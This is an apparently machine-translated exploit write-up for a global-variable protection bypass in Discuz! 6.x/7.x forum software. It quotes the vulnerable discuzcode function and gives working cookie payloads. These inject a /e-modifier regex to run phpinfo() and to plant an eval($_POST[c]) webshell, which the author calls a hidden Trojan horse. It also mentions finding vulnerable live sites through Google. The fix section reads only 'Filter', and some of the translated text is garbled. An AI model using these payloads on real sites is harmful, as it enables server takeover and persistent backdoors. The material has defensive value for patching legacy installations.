Discuz! Command Execution for two versions of foreground Products

Discuz! Command Execution for two versions of foreground Products

Affected Version: Discuz! 6. x/7.x global variable protection Bypass Vulnerability

The Internet has been relatively public, see: http://www.bkjia.com/Article/201005/47360.html

Description: Discuz! 6. x/7.x global variable defense Bypass Vulnerability POC: Missing



It may be because the author did not release the POC, so it was not taken seriously by others.

This vulnerability is exploited in many places, so this command is not restricted.



The vulnerability principle is not mentioned. Here we will talk about the vulnerability utilization:

File:

Include/discuzcode. func. php

function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode = 1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {$message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);}$msglower = strtolower($message);//$htmlon = $htmlon && $allowhtml ? 1 : 0;if(!$htmlon) {$message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);}if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {if(!$discuzcodes['smiliesreplaced']) {foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {$GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';}$discuzcodes['smiliesreplaced'] = 1;}$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);}

Note Row 3:

$ Message = preg_replace ($ GLOBALS ['_ DCACHE'] ['smilies '] ['searcharray'], $ GLOBALS ['_ dcache'] ['smilies'] ['replacearray'], $ message, $ maxsmilies );



Therefore

GLOBALS [_ DCACHE] [smilies] [searcharray] =/. */eui; GLOBALS [_ DCACHE] [smilies] [replacearray] = phpinfo ();



.

Cookie band in request

GLOBALS [_ DCACHE] [smilies] [searcharray] = /. */eui; GLOBALS [_ DCACHE] [smilies] [replacearray] = eval ($ _ POST [c]) % 3B;

That is to say, a Trojan Horse is hidden and cannot be easily discovered.



I tried google to verify it and found that there are still a lot of tricks.

 

 

 

 

Solution:

Filter